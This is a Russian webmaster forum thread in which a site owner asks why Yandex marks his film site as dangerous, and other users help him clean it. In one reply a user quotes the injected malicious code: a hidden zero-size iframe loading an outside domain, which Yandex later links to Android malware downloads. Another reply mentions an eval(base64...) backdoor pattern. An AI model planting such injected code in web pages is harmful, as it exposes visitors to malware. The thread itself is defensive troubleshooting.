Сайт может угрожать безопасности

Р
На сайте с 29.06.2012
Offline
66
642

Здравствуйте.

Яндекс почему-то посчитал сайт опасным:

Сайт может угрожать безопасности вашего компьютера или мобильного устройства

В следствии чего трафф упал в 10раз!

Хтачч в корне ничего подозрительного не содержит, шаблон вроде тоже (на сколько я вижу, но я в этом не силен) Пожалуйста помогите найти и исправить причину.

Сайт http://dokfilmonline.com/

Diversant
На сайте с 29.03.2006
Offline
322
#1

В подвале iframe какой то левый☝

N
На сайте с 08.10.2011
Offline
188
#2

Вот:

<iframe src="http://hatebuhi.cf/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

dokfilmonline.com/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&3

Р
На сайте с 29.06.2012
Offline
66
#3

Благодарю. Разобрался, неизвестный хитрец сделал так что мне (когда я залогинен) код не показывается. А я весь код перешерстил, думаю да что такое. И только после вашего поста на меня снизошло озарение)) зашел на сайт как гость и вот он код. Еще раз спасибо!

noiws

Эту дрянь тоже нужно удалить?

dokfilmonline.com/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&3

Я ее найти не могу((( Вот кусок мэйн.тпл

<head>
<link rel="shortcut icon" href="http://dokfilmonline.com//favicon.ico" />

{headers}
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="{THEME}/css/style.css" />
<link rel="stylesheet" type="text/css" href="{THEME}/css/engine.css" />

Я так понимаю она выводится из {headers}, а где это править? В папке с шабом такого файла нет.

M
На сайте с 21.10.2014
Offline
1
#4

Неужели сейчас это стало повальным явлением? Моя компания продвигает сайты, на двух из них недавно стали появляться левые ссылки и коды. И если на одном сайте взлом был похож на месть (ну мне так казалось, т. к. на FTP нашёлся файл index.php, где было написано "Silence is golden"), то на другом явно были ссылки "под продажу" - прописаны адекватные анкоры.

Позже оказалось, что "Silence is golden" - типичный бонус для хакнутых сайтов на вордпрессе вместе с приложением кодов типа <?php eval(base64...

Знакомые программисты сказали, что тем, кто заходил на сайт через FTP, нужно чистить комп от троянов или (если проблема не в этом) найти хостера с более защищёнными серверами. Может быть, поможет для дальнейшей профилактики.

Желаю Вам удачи в зачистке)

R
На сайте с 24.01.2008
Offline
180
#5

Насколько я понял у вас был просто фрейм, нужно искать источник проникновения. А то что вы указали это насколько я понимаю рабочий код.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Р
На сайте с 29.06.2012
Offline
66
#6

Ифрейм удалил. Заказал перепроверку на вебмастер.яндекс. Сегодня она состоялась и яша говорит что на сайте все равно остался код(((

Вердикт яндекса:

Yandex/MalAndroid

Данный вердикт означает, что на странице присутствуют ссылки на скачивание вредоносного программного обеспечения для ОС Android.

У админа был пароль до боли простой аля "123" (даже не думал что кто-то позарится на мой дохлый сайт), сейчас я пароль сменил.

Как быть? Куда копать? Помогите пожалуйста.

The WishMaster
На сайте с 29.09.2005
Offline
2543
#7
Рагожин:
Куда копать?

Искать вредный код во всех файлах.

Пешу текста дешыго! Тематики - туризм, СЕО, творчество, кулинария, шизотерика :)
Kofe-man
На сайте с 22.10.2014
Offline
1
#8

Попробуйте поискать вредный код во всех подключаемых файлах. Если Вы сами найти не сможете, можете нанять какого-нибудь фрилансера для поиска вредоносного кода. В инете есть сервисы для поиска троянов на сайте. Если хотите, могу в личку скинуть ссылки

Написание скриптов на PHP и JS на заказ(парсеры,грабберы, чекеры, обработчики различных файлов и т.д., и т.п.). Программирование для Джумла, ДЛЕ, Опенкарт. Цены - приемлемые. Обращайтесь в личку

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий